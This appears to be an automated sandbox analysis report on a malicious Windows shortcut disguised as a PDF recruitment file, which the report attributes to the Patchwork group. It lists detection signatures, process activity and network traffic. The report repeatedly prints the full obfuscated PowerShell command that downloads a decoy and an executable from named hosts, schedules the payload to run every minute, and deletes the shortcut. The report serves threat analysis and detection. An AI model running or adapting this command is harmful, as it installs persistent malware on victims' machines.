Edit tour

Windows Analysis Report
Recruit1123.pdf.lnk

Overview

General Information

Sample Name:	Recruit1123.pdf.lnk
Analysis ID:	1344055
MD5:	948b3b9b444731029662621b55322e3c
SHA1:	54ef6b79fae6b105f86c1c511389021ea92a79bc
SHA256:	b019ed0bb09bda78af75f941ba1bb88f3b3e3604a202309d8661fdaacb04d02e
Tags:	aptlnkPatchwork
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Windows shortcut file (LNK) starts blacklisted processes

Deletes itself after installation

Found URL in windows shortcut file (LNK)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows shortcut file (LNK) contains suspicious command line arguments

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

JA3 SSL client fingerprint seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Process Tree

System is w10x64

powershell.exe (PID: 5224 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 $ProgressPreference = 'SilentlyContinue';i''w''r "https://pd560.b-cdn.net/fha" -OutFile C:\Users\Public\Recruit1123.pdf;s''a''p''s C:\Users\Public\Recruit1123.pdf;i''w''r "https://pld956.b-cdn.net/jhv" -OutFile "C:\Windows\Tasks\jumbo";r''e''n -Path "C:\Windows\Tasks\jumbo" -NewName "C:\Windows\Tasks\Services.exe";c''p''i 'C:\Users\Public\Recruit1123.pdf' -destination .;S''C''H''T''A''S''K''S'' /Create /Sc minute /Tn EdgeUpdate /tr 'C:\Windows\Tasks\Services';e''r''a''s''e *d?.?n? MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7248 cmdline: "C:\Windows\system32\schtasks.exe" /Create /Sc minute /Tn EdgeUpdate /tr C:\Windows\Tasks\Services MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Recruit1123.pdf.lnk

Virustotal: Detection: 24%

Perma Link

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Source: unknown	HTTPS traffic detected: 212.102.46.118:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 212.102.46.118:443 -> 192.168.2.4:49730 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32r source: powershell.exe, 00000000.00000002.1702027969.000001537F6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1702027969.000001537F6F8000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic	HTTP traffic detected: GET /fha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pd560.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jhv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pld956.b-cdn.netConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Joe Sandbox View

IP Address: 212.102.46.118 212.102.46.118

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 17 Nov 2023 10:12:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: BunnyCDN-WA1-1120CDN-RequestId: 3543157c95d314c03a089ddd23218edd
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 17 Nov 2023 10:12:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: BunnyCDN-WA1-1120CDN-RequestId: fc8d291ffe4e221e1bf1bea7a0c406a4

Source: powershell.exe, 00000000.00000002.1680986165.0000015302ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302ECD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fonts.bunny.net/css?family=Rubik:300
Source: powershell.exe, 00000000.00000002.1696610118.0000015311922000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1680986165.0000015302EA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pd560.b-cdn.net
Source: powershell.exe, 00000000.00000002.1680986165.0000015301AE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015301B5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1680986165.00000153035ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pld956.b-cdn.net
Source: powershell.exe, 00000000.00000002.1680986165.00000153018B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1680986165.0000015301AE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015301B5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1680986165.00000153018B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1680986165.0000015302ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302ECD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net
Source: powershell.exe, 00000000.00000002.1680986165.0000015302ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302ECD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg
Source: powershell.exe, 00000000.00000002.1680986165.0000015302ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302ECD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css
Source: powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1680986165.0000015301AE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015301B5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1680986165.0000015302A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1700241470.0000015319A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000000.00000002.1696610118.0000015311922000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1680986165.0000015302A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pd560.b-cdn.net
Source: powershell.exe, 00000000.00000002.1680986165.0000015303070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pd560.b-cdn.net/
Source: powershell.exe, 00000000.00000002.1702027969.000001537F6C0000.00000004.00000020.00020000.00000000.sdmp, Recruit1123.pdf.lnk	String found in binary or memory: https://pd560.b-cdn.net/fha
Source: powershell.exe, 00000000.00000002.1701051423.0000015319D69000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1702547904.000001537F738000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1702027969.000001537F6C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1703317919.000001537FDC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699997022.00000153199E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1703148422.000001537FA75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pd560.b-cdn.net/fha-OutFileC:
Source: powershell.exe, 00000000.00000002.1702547904.000001537F79E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pd560.b-cdn.net/fhaP%3
Source: powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pld956.b-cdn.ne
Source: powershell.exe, 00000000.00000002.1680986165.0000015303070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pld956.b-cdn.net
Source: powershell.exe, 00000000.00000002.1702027969.000001537F6C0000.00000004.00000020.00020000.00000000.sdmp, Recruit1123.pdf.lnk	String found in binary or memory: https://pld956.b-cdn.net/jhv
Source: powershell.exe, 00000000.00000002.1701051423.0000015319D69000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1702547904.000001537F738000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1702027969.000001537F6C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1703317919.000001537FDC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699997022.00000153199E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1703148422.000001537FA75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pld956.b-cdn.net/jhv-OutFileC:
Source: powershell.exe, 00000000.00000002.1702027969.000001537F6F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pld956.b-cdn.net/jhvnz

Source: unknown

DNS traffic detected: queries for: pd560.b-cdn.net

Source: global traffic	HTTP traffic detected: GET /fha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pd560.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jhv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pld956.b-cdn.netConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 212.102.46.118:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 212.102.46.118:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

Found URL in windows shortcut file (LNK)

Source: Initial file	Strings: https://pd560.b-cdn.net/fha
Source: Initial file	Strings: https://pld956.b-cdn.net/jhv

Windows shortcut file (LNK) contains suspicious command line arguments

Source: Recruit1123.pdf.lnk

LNK file: -w 1 $ProgressPreference = 'SilentlyContinue';i''w''r "https://pd560.b-cdn.net/fha" -OutFile C:\Users\Public\Recruit1123.pdf;s''a''p''s C:\Users\Public\Recruit1123.pdf;i''w''r "https://pld956.b-cdn.net/jhv" -OutFile "C:\Windows\Tasks\jumbo";r''e''n -Path "C:\Windows\Tasks\jumbo" -NewName "C:\Windows\Tasks\Services.exe";c''p''i 'C:\Users\Public\Recruit1123.pdf' -destination .;S''C''H''T''A''S''K''S'' /Create /Sc minute /Tn EdgeUpdate /tr 'C:\Windows\Tasks\Services';e''r''a''s''e *d?.?n?

Source: Recruit1123.pdf.lnk

Virustotal: Detection: 24%

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 $ProgressPreference = 'SilentlyContinue';i''w''r "https://pd560.b-cdn.net/fha" -OutFile C:\Users\Public\Recruit1123.pdf;s''a''p''s C:\Users\Public\Recruit1123.pdf;i''w''r "https://pld956.b-cdn.net/jhv" -OutFile "C:\Windows\Tasks\jumbo";r''e''n -Path "C:\Windows\Tasks\jumbo" -NewName "C:\Windows\Tasks\Services.exe";c''p''i 'C:\Users\Public\Recruit1123.pdf' -destination .;S''C''H''T''A''S''K''S'' /Create /Sc minute /Tn EdgeUpdate /tr 'C:\Windows\Tasks\Services';e''r''a''s''e *d?.?n?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /Sc minute /Tn EdgeUpdate /tr C:\Windows\Tasks\Services
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /Sc minute /Tn EdgeUpdate /tr C:\Windows\Tasks\Services	Jump to behavior

Source: Recruit1123.pdf.lnk

LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oousz00f.vha.ps1

Jump to behavior

Source: classification engine

Classification label: mal84.rans.evad.winLNK@4/5@2/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32r source: powershell.exe, 00000000.00000002.1702027969.000001537F6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1702027969.000001537F6F8000.00000004.00000020.00020000.00000000.sdmp

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /Sc minute /Tn EdgeUpdate /tr C:\Windows\Tasks\Services

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: c:\users\user\desktop\recruit1123.pdf.lnk

Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.lnk

Static PE information: Recruit1123.pdf.lnk

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4445			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5114			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -8301034833169293s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000000.00000002.1701051423.0000015319CB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: powershell.exe, 00000000.00000002.1700800996.0000015319A92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: unknown

